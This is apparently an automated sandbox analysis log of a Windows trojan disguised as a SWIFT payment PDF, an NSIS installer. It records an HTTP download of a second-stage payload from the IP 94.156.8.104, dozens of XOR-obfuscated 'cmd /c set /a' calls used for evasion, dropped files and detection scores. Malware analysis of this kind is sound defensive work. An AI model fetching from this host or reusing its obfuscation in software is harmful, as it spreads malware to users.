          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: unknownTCP traffic detected without corresponding DNS query: 94.156.8.104
          Source: global trafficHTTP traffic detected: GET /yFtqL16.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 94.156.8.104Cache-Control: no-cache
          Source: SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134625856432.00000000076B0000.00000004.00000020.00020000.00000000.sdmp, SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134626594503.0000000009280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://94.156.8.104/yFtqL16.bin
          Source: SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134626594503.0000000009280000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://94.156.8.104/yFtqL16.binApokOpt103.78.0.98/yFtqL16.bin
          Source: SWIFTCOPYMT1030000000_pdf.exe, SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: SWIFTCOPYMT1030000000_pdf.exe, 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp, SWIFTCOPYMT1030000000_pdf.exe, 00000006.00000000.133684224870.0000000000409000.00000008.00000001.01000000.00000004.sdmp, SWIFTCOPYMT1030000000_pdf.exe, 00000088.00000002.134606727098.0000000000409000.00000008.00000001.01000000.00000004.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_00404FC2 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,FindCloseChangeNotification,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,6_2_00404FC2
          Source: Conhost.exeProcess created: 93

          System Summary

          barindex
          Initial sample is a PE file and has a suspicious name
          Source: initial sampleStatic PE information: Filename: SWIFTCOPYMT1030000000_pdf.exe
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_004030EF EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,6_2_004030EF
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 136_2_00403188 CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,136_2_00403188
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile created: C:\Windows\resources\0409Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile created: C:\Windows\resources\0409\gashanens.iniJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_004048016_2_00404801
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 136_2_00404801136_2_00404801
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll B9631423A50C666FAF2CC6901C5A8D6EB2FECD306FDD2524256B7E2E37B251C2
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\nsExec.dll 9A1A5C6F598247BFA52624CD793B9EF4FB85863CC9DFD69EB7EF671CACC906C9
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: String function: 00402A07 appears 51 times
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092
          Source: SWIFTCOPYMT1030000000_pdf.exeStatic PE information: invalid certificate
          Source: SWIFTCOPYMT1030000000_pdf.exeStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
          Source: Nonaddicting.exe.136.drStatic PE information: Resource name: RT_VERSION type: x86 executable not stripped
          Source: SWIFTCOPYMT1030000000_pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
          Source: classification engineClassification label: mal96.troj.evad.winEXE@396/18@0/1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_004042C5 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,6_2_004042C5
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeCode function: 6_2_00402036 CoCreateInstance,MultiByteToWideChar,6_2_00402036
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile created: C:\Users\user\udskriftskartotekJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1268
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile created: C:\Users\user\AppData\Local\Temp\nsaF52.tmpJump to behavior
          Source: SWIFTCOPYMT1030000000_pdf.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: SWIFTCOPYMT1030000000_pdf.exeReversingLabs: Detection: 15%
          Source: SWIFTCOPYMT1030000000_pdf.exeVirustotal: Detection: 36%
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeFile read: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "193^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "201^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1268 -s 1092
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "221^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "240^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "153^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "220^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "133^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "157^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "216^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "145^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "137^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
          Source: C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "129^177"Jump to behavior
